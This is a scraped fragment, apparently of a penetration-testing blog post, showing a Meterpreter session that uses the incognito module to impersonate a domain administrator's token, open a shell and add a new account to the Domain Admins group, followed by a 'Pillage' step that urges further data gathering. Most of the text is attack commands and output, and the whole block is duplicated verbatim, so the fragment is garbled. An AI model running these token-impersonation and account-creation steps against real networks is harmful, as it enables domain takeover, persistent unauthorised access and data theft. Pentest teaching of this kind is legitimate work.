incognito - metasploit
http://www.bettertogether.org.au/blog/b/danielweis/archive/2011/12/08/path-of-least-resistance.aspx
meterpreter > load incognito
meterpreter > list_tokens -u
Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON
MYDOM\adaministrator
meterpreter > impersonate_token MYDOM\\adaministrator
meterpreter > getuid
Server username: MYDOM\adaministrator
meterpreter > shell
Process 2936 created.
Channel 6 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\> whoami
mydom\adaministrator
C:\> net user timmedin /add /domain
The request will be processed at the primary domain controller for domain MYDOM.
The command completed successfully.
C:\> net group “Domain Admins” timmedin /add /domain
The request will be processed at the primary domain controller for domain MYDOM.
The command completed successfully.
Step 7 – Pillage
Getting Domain Administrator level access is not the end, but rather it is the beginning of a different portion of the test. Executives don’t know what a Domain is, nor do they know what a Domain Administrator is. Go find some cool information to demonstrate what is at risk here. This step requires a book to fully describe and is often overlooked because some testers stop at Step 6 because they believe that is the end goal. The bad guys don’t stop there, so why should we when acting as bad guys?
meterpreter > load incognito
meterpreter > list_tokens -u
Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON
MYDOM\adaministrator
meterpreter > impersonate_token MYDOM\\adaministrator
meterpreter > getuid
Server username: MYDOM\adaministrator
meterpreter > shell
Process 2936 created.
Channel 6 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\> whoami
mydom\adaministrator
C:\> net user timmedin /add /domain
The request will be processed at the primary domain controller for domain MYDOM.
The command completed successfully.
C:\> net group “Domain Admins” timmedin /add /domain
The request will be processed at the primary domain controller for domain MYDOM.
The command completed successfully.
Step 7 – Pillage
Getting Domain Administrator level access is not the end, but rather it is the beginning of a different portion of the test. Executives don’t know what a Domain is, nor do they know what a Domain Administrator is. Go find some cool information to demonstrate what is at risk here. This step requires a book to fully describe and is often overlooked because some testers stop at Step 6 because they believe that is the end goal. The bad guys don’t stop there, so why should we when acting as bad guys?